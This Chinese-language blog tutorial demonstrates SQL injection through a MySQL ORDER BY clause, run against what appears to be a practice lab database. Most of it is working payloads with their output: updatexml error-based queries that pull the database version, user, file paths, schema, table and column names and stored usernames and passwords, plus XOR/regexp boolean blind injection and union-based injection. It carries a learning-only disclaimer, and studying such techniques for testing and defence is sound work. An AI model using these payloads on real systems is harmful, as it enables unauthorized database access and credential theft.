Order by排序注入方法小总结

今天总结一下注入点在order by排序注入,学习一下记录下这个过程
声明:此文谨供学习记录研究使用,切勿用于非法用途,否则后果自负!

注入方法介绍

当页面出现mysql报错信息时,注入点在 order by后面,此时可以利用报错信息进行注入。

  • 正常语句
mysql> select * from users order by id;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+
13 rows in set (0.00 sec)

mysql> select * from users order by id desc;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
| 14 | admin4   | admin4     |
| 12 | dhakkan  | dumbo      |
| 11 | admin3   | admin3     |
| 10 | admin2   | admin2     |
|  9 | admin1   | admin1     |
|  8 | admin    | admin      |
|  7 | batman   | mob!le     |
|  6 | superman | genious    |
|  5 | stupid   | stupidity  |
|  4 | secure   | crappy     |
|  3 | Dummy    | p@ssword   |
|  2 | Angelina | I-kill-you |
|  1 | Dumb     | Dumb       |
+----+----------+------------+
13 rows in set (0.00 sec)

mysql>

其中select * from users order by id desc;desc是可控的传参值。


order by 与报错注入
  • 下面进行报错注入
    • 首先获取基本一些基本信息总结
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select database())),0));
ERROR 1105 (HY000): XPATH syntax error: '~security'        //获取当前数据库
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select version())),0));         
ERROR 1105 (HY000): XPATH syntax error: '~5.5.53'      //获取数据库版本
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select user())),0));        
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost'     //获取用户
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select @@datadir)),0));
ERROR 1105 (HY000): XPATH syntax error: '~E:\soft\phpmystudy\MySQL\data\'        //获取数据库路径
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select @@version_compile_os)),0));
ERROR 1105 (HY000): XPATH syntax error: '~Win32'      //获取操作系统
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select @@basedir)),0));
ERROR 1105 (HY000): XPATH syntax error: '~E:/soft/phpmystudy/MySQL/'       //mysql安装路径
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select session_user())),0));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost'      //获取连接数据库的用户名
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select current_user())),0));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost'      //获取当前用户名
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select system_user())),0));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost'        //获取系统用户名
mysql>
Order by排序注入方法小总结_第1张图片
图片.png
  • 获取数据信息

获取数据库个数

mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(*) from information_schema.schemata)),0));
ERROR 1105 (HY000): XPATH syntax error: '~11'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(schema_name) from information_schema.schemata)),0));
ERROR 1105 (HY000): XPATH syntax error: '~11'
mysql>

注:count(*)是对结果函数统计,而count(schema_name)则是对不为空的行数结果进行统计

获取数据库列表信息

mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~information_schema'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~challenges'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 2,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~dvwa'
mysql>

注: 这里使用limit逐条获取,为什么这样呢?因为我发现使用group_concat()批量查询输出结果长度有限制,因此需要这样一条一条获取了,当然数据多的时候就要简单写个python脚本跑了

  • 获取某数据库表信息

获取表个数
payload:

and(updatexml(1,concat(0x7e,(select count(*) from information_schema.tables where table_schema = "数据库名")),0))
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(*) from information_schema.tables where table_schema = "security")),0));
ERROR 1105 (HY000): XPATH syntax error: '~4'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(table_name) from information_schema.tables where table_schema = "security")),0));
ERROR 1105 (HY000): XPATH syntax error: '~4'
mysql>

获取表名
payload:

and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = "数据库名")),0))
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = "security")),0));
ERROR 1105 (HY000): XPATH syntax error: '~emails,referers,uagents,users'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = "security" limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~emails'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = "security" limit 1,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~referers'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = "security" limit 2,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~uagents'
mysql>
  • 获取某数据库中某个表字段信息

字段个数
payload:

and (updatexml(1,concat(0x7e,(select count(*) from information_schema.columns where table_schema = "数据库名" and table_name = "表名")),0))
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select count(*) from information_schema.columns where table_schema = "security" and table_name = "users")),0));
ERROR 1105 (HY000): XPATH syntax error: '~3'
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select count(column_name) from information_schema.columns where table_schema = "security" and table_name = "users")),0));
ERROR 1105 (HY000): XPATH syntax error: '~3'
mysql>

获取字段名,字段多的需要单条获取
payload:

and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = "数据库名" and table_name = "表名")),0))
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = "security" and table_name = "users")),0));
ERROR 1105 (HY000): XPATH syntax error: '~id,username,password'
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema = "security" and table_name = "users" limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~id'
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema = "security" and table_name = "users" limit 1,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~username'
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema = "security" and table_name = "users" limit 2,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~password'
mysql>
  • 最后获取想要的信息就简单了
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select username,password from users limit 0,1)),0));
ERROR 1241 (21000): Operand should contain 1 column(s)
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select username from users limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~Dumb'
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select password from users limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~Dumb'
mysql>

经测试,貌似只能指定获取一个字段信息


order by 与盲注

当页面没有展示MYSQL的错误信息时,且只能根据页面回显的状态进行判断时,可以使用布尔盲注

  • 简单看两条语句
mysql> select * from users order by id ^(select(select version()) regexp '^aaaa');
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+
13 rows in set (0.00 sec)

mysql> select * from users order by id ^(select(select version()) regexp '^5');
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  3 | Dummy    | p@ssword   |
|  2 | Angelina | I-kill-you |
|  5 | stupid   | stupidity  |
|  4 | secure   | crappy     |
|  7 | batman   | mob!le     |
|  6 | superman | genious    |
|  9 | admin1   | admin1     |
|  8 | admin    | admin      |
| 11 | admin3   | admin3     |
| 10 | admin2   | admin2     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+
13 rows in set (0.00 sec)

mysql>
Order by排序注入方法小总结_第2张图片
图片.png

简单解释一下就是在regexp正则匹配的时候,如果匹配到数据返回1(00000001)的时候,此时的1会和id中的数据的二进制进行异或,按照异或的结果进行升序排列,所以显示的排列会发生变化;反之当进行正则匹配的时候,未匹配到数据返回0(00000000),此时数字和0异或的结果还是本身,所以显示的排列不会发生改变。

总结:当页面排序紊乱时则说明正则匹配到正确数据,页面排序未发生紊乱时则说明正则没有匹配到数据

通过以上可以判断数据库版本在5以上,这里的'^5'也可以转换成^5的十六进制

order by 与 union 联合查询

  • $query = "select * from users order by id $input ";没有使用括号包裹的时候,是无法直接使用union查询的。

  • $query = "(select * from users order by id $input) ";使用括号进行包裹的时候,此时是可以进行union查询的。

  • 获取版本号

mysql> (select * from users order by id ) union(select 1,(version()),3);
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
|  1 | 5.5.53   | 3          |
+----+----------+------------+
14 rows in set (0.00 sec)

mysql>
Order by排序注入方法小总结_第3张图片
图片.png
  • 其他就不一一截图了,查询语句格式如下:
(select * from users order by id ) union(select 1,(payload),3);

数据库信息payload:

database()               //获取当前数据库
version()                //获取数据库版本
user()                   //获取用户
@@datadir                //获取数据库路径
@@version_compile_os     //获取操作系统
@@basedir                //mysql安装路径
session_user()           //获取连接数据库的用户名
current_user()           //获取当前用户名
system_user()            //获取系统用户名

表信息payload: 同上,不再重复!

参考:
https://www.freebuf.com/column/145988.html

https://www.anquanke.com/post/id/158674

你可能感兴趣的:(Order by排序注入方法小总结)